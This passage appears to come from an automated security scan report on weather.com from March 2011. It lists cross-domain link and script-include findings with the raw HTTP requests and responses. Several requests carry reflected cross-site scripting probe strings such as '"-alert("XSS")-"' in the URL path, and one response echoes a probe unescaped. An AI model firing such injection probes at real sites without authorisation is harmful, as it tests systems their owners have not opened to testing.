<li><a href="http://www.classmeteo.com" onmousedown="setClick();" onMouseUp="this.href=intelliTrak({'href':this.href,'cm_ven' : 'weathercom','cm_cat' : 'header','cm_ite' : 'brand','cm_pla' : 'text'});" target="_self">Italia (Italiano)</a>
...[SNIP]...
<a href="http://iwitness.weather.com/_Carly-Enjoying-The-Snow/video/1491535/148597.html" from="nav_spotlight">
                                <img src="http://s.imwx.com/img/images/golden_loves_snow.jpg" alt="Spotlight Image" width="120"
                                   height="90" /><br>
...[SNIP]...
<a href="/activities/travel/vacationplanner/destination/top10/beaches.html?id=1&" from="nav_spotlight">Top 10 Beach Picks&nbsp;
                                       <img width="29" height="13" src="http://s.imwx.com/v.20100719.135915/img/common/icon-new.png" alt="NEW">
                                   </a>
...[SNIP]...
<a
                           href="/outdoors/home-improvement/" from="nav_secondary" >Home Improvement&nbsp;
                           <img width="29" height="13" src="http://s.imwx.com/v.20100719.135915/img/common/icon-new.png" alt="NEW">
                       </a>
...[SNIP]...
<a href="/services/ipad.html" from="nav_secondary">iPad App&nbsp;
                                       <img width="29" height="13" src="http://s.imwx.com/v.20100719.135915/img/common/icon-new.png" alt="NEW">
                                   </a>
...[SNIP]...
<a href="/tv/programs/ywt.html" from="nav_spotlight">Exclusive Behind-the-Scenes View&nbsp;
                                       <img width="29" height="13" src="http://s.imwx.com/v.20100719.135915/img/common/icon-new.png" alt="NEW">
                                   </a>
...[SNIP]...
<A href="http://www.weather.com/newscenter/nationalforecast/index.html"><IMG height=100 src="http://i.imwx.com/web/common/images/gfx_weathernews.jpg" width=100></A>
...[SNIP]...
<A href="http://www.weather.com/activities/travel/vacationplanner/"><IMG height=100 src="http://i.imwx.com/web/common/images/gfx_travelplanner.jpg" width=100></A>
...[SNIP]...
<A href="http://www.weather.com/tv/"><IMG height=100 src="http://i.imwx.com/web/common/images/gfx_ontv.jpg" width=100></A>
...[SNIP]...
<dd><a href="http://www.theweatherchannelkids.com/" target="_blank">TWC Kids</a></dd> <dd><a href="http://weatherbonk.com/" target="_blank">WeatherBonk</a>
...[SNIP]...
<dd><a title="America's Event And Attraction Search Engine - Festivals, Arts And Crafts, Fairs And Many Other Local Events And Attractions" href="http://www.eventcrazy.com" target="_blank">EventCrazy.com Events</a>
...[SNIP]...
<dd><a href="http://www.webmd.com/allergies/default.htm" target="_blank">WebMD Asthma &amp; Allergy Center</a>
...[SNIP]...
<dd><a href="http://www.godaddy.com/default.aspx?isc=gdweather2" target="_blank">Web Hosting at GoDaddy.com</a>
...[SNIP]...
<dd><a href="http://www.forgetaway.com" target="_blank"><br>
...[SNIP]...
<li><a target="_blank" href="http://twcmediakit.com/" from="footer">Advertising</a>
...[SNIP]...
<li class="twc-last"><a href="http://www.controlyourtv.org/Intro.aspx" target="_blank" from="footer">Parental Controls</a>
...[SNIP]...
4.4. http://www.weather.com/pagelet/bc/56967  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/56967

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagelet/bc/56967? HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1300988007219; RMID=c245359a4d8b7f55

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Thu, 24 Mar 2011 17:33:43 GMT
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:37:54 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x02
X-Cache-Hits: 1
X-Varnish: 1156282709 1156204280
Connection: keep-alive
Content-Length: 4162


<script>
function PopupCenter(pageURL, title,w,h) {
var left = (screen.width/2)-(w/2);
var top = (screen.height/2)-(h/2);
var targetWin = window.open (pageURL, title, 'toolbar=no,
...[SNIP]...
<li>
   <iframe class="twc-facebook-icon" src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com    %2FTheWeatherChannel&amp;layout=button_count&amp;show_faces=true&amp;width=92&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no"    frameborder="0" ALLOWTRANSPARENCY="true"></iframe>
...[SNIP]...
4.5. http://www.weather.com/pagelet/bc/59233  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/59233

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagelet/bc/59233? HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/services/desktop.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=; s_pers=%20s_nr%3D1300988115565%7C1303580115565%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.a=1300988116526

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Thu, 24 Mar 2011 17:37:47 GMT
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:47 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x01
X-Varnish: 2184649200
Connection: keep-alive
Content-Length: 4179


<script>
function PopupCenter(pageURL, title,w,h) {
var left = (screen.width/2)-(w/2);
var top = (screen.height/2)-(h/2);
var targetWin = window.open (pageURL, title, 'toolbar=no,
...[SNIP]...
<li>
   <iframe class="twc-facebook-icon" src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com    %2FTheWeatherChannel&amp;layout=button_count&amp;show_faces=true&amp;width=92&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no"    frameborder="0" ALLOWTRANSPARENCY="true"></iframe>
...[SNIP]...
4.6. http://www.weather.com/pagelet/bc/62264  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/62264

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagelet/bc/62264?locid=undefined HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=-1; fromStr=; s_pers=%20s_nr%3D1300988049502%7C1303580049502%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; LocID=; fsr.a=1300988050037

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Thu, 24 Mar 2011 17:35:20 GMT
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:38:37 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x02
X-Varnish: 1096871981
Connection: keep-alive
Content-Length: 4180


                                                   <script>
function PopupCenter(pageURL, title,w,h) {
var left = (screen.width/2)-(w/2);
var top = (screen.height/2)-(h/2);
var targetWin = window.open (pageUR
...[SNIP]...
<li>
   <iframe class="twc-facebook-icon" src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com    %2FTheWeatherChannel&amp;layout=button_count&amp;show_faces=true&amp;width=92&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no"    frameborder="0" ALLOWTRANSPARENCY="true"></iframe>
...[SNIP]...
5. Cross-domain script include  previous  next
There are 10 instances of this issue:

5.1. http://www.weather.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:28:40 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii3x01
X-Cache-Hits: 1
X-Varnish: 2366335366 2366335339
Date: Thu, 24 Mar 2011 17:28:17 GMT
Connection: keep-alive
Content-Length: 159636

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssVersion/?">


<script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"></script>


<script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"></script>
...[SNIP]...
5.2. http://www.weather.com/activities/driving/rushhour/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /activities/driving/rushhour/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /activities/driving/rushhour/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300987999757%7C1303579999757%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/activities/driving/rushhour/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 17:32:46 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Server: Apache
SVRNAME: web1x10
VarnishSet: web
X-Varnish: 1455522174
Vary: Accept-Encoding
Content-Length: 96659

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<HTML>
<HEAD>
<TITLE>Traffic reports for rush hour traffic conditions and delays from weather.com<
...[SNIP]...
<!-- DFP -->

<script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s.imwx.com/v.20110214.1/global/common/elements/javascript/a21-2_3.js"></script>
<script src="http://j.imwx.com/v.20110214.1/common/a21/plugins/a21plugins.js"></script>
...[SNIP]...
</style>
<script type="text/javascript" src="http://s.imwx.com/js/2.8.0r4/yuiloader-dom-event/yuiloader-dom-event.js"></script>
<script type="text/javascript" src="http://j.imwx.com/v.20100826.0/common/header/javascript/wx-header-events.js"></script>
...[SNIP]...
5.3. http://www.weather.com/common/a21/makeRequest-2_3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /common/a21/makeRequest-2_3.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /common/a21/makeRequest-2_3.html?pos=WX_Top300Variable&key=1300987733362 HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1300987732569; fv=1; RMID=c245359a4d8b7f55

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 17:28:20 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Server: Apache
SVRNAME: web3x03
VarnishSet: web
X-Varnish: 2587929389
Vary: Accept-Encoding
Content-Length: 2503

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>Make a request</title>

<script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"></script>
...[SNIP]...
5.4. http://www.weather.com/mobile/swap/send_sms_to_phone.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /mobile/swap/send_sms_to_phone.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mobile/swap/send_sms_to_phone.html?from=hdr_locations HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; fromStr=; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%25252523%252526ot%25253DA%3B; s_pers=%20s_nr%3D1300988109827%7C1303580109827%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Date: Thu, 24 Mar 2011 17:37:26 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
SVRNAME: web1x13
Expires: Thu, 24 Mar 2011 17:36:18 GMT
Connection: keep-alive
Content-Length: 34038

<HTML>
   <HEAD>
    <TITLE>Wireless Internet</title>
<script language="JavaScript">var ts_pageid="59201";var ts_pagename="/mobile/swap/send_sms_to_phone.html";var ts_level1="MOBILE";var ts_level2="swap
...[SNIP]...
<!-- DFP -->

<script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s.imwx.com/v.20110214.1/global/common/elements/javascript/a21-2_3.js"></script>
<script src="http://j.imwx.com/v.20110214.1/common/a21/plugins/a21plugins.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=K06578" CHARSET="ISO-8859-1"></script>
...[SNIP]...
5.5. http://www.weather.com/pagelet/apps/traffic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/apps/traffic/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /pagelet/apps/traffic/?sub HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
Origin: http://www.weather.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780
Content-Length: 0

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:45:00 GMT
Server: Apache
Vary: Accept-Encoding
nnCoection: close
SVRNAME: wxii1x04
X-Varnish: 1510914846
Date: Thu, 24 Mar 2011 17:40:00 GMT
Connection: keep-alive
Content-Length: 108234

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

...[SNIP]...
</style>


<script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"></script>


<script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"></script>
...[SNIP]...
5.6. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Date: Thu, 24 Mar 2011 17:40:48 GMT
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:17 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x07
X-Varnish: 2184720384
Connection: keep-alive
Content-Length: 159902

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssVersion/pagelet8cd82"-alert("XSS")-"370523ec97/bc/favicon2.ico?">


<script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"></script>


<script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"></script>
...[SNIP]...
5.7. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; 